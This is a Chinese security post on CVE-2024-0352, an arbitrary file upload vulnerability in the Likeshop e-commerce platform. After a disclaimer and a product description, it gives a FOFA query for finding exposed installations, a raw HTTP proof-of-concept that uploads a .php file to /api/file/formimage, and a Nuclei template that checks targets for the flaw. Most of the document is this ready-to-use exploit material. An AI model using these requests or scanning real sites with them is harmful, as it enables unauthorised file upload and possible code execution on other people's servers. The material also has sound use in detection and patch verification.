Likeshop任意文件上传漏洞(CVE-2024-0352)【附POC】

免责声明：

由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

产品介绍

Likeshop是一种电子商务平台，专注于社交媒体上的购物体验和社交销售。它提供了一个简单而强大的工具，帮助个人和企业在社交媒体上创建和管理他们的在线商店，并直接与他们的粉丝和客户进行交互。

通过Likeshop，用户可以轻松地将他们的产品目录展示在社交媒体上，并与粉丝分享他们的商品和促销活动。用户可以通过添加购买链接或购买按钮，将产品直接嵌入到社交媒体帖子和页面中，使粉丝能够直接在社交媒体上购买商品。

Likeshop还提供了一套简单而直观的工具，帮助用户管理他们的订单、库存和付款。用户可以轻松地跟踪订单状态、管理库存数量，并接受多种在线支付方式。

此外，Likeshop还具有强大的社交销售功能。用户可以通过与粉丝建立紧密的互动，回答问题、提供个性化建议和推荐，增强客户的购物体验，并促进销售增长。

总之，Likeshop为个人和企业提供了一个简单而高效的方式，在社交媒体上建立和管理在线商店，并与粉丝和客户进行交互，实现社交媒体上的购物和社交销售体验。

资产搜索

fofa: title="Likeshop"

漏洞复现

POC

POST /api/file/formimage HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
Content-Length: 179

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="1.php"
Content-Type: application/x-php

testtest
------WebKitFormBoundarygcflwtei--

Nuclei:

id: Likeshop_upload

info:
  name: Likeshop_upload
  author: joyboy
  severity: critical
  description: |
    Likeshop任意文件上传漏洞CVE-2024-0352
  metadata:
    max-request: 1
    verified: true
    fofa-query: title="Likeshop"
  tags: cve

http:
  - raw:
      - |-
        POST /api/file/formimage HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei

        ------WebKitFormBoundarygcflwtei
        Content-Disposition: form-data; name="file";filename="test.php"
        Content-Type: application/x-php

        testtest
        ------WebKitFormBoundarygcflwtei--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '上传文件成功'

      - type: status
        status:
          - 200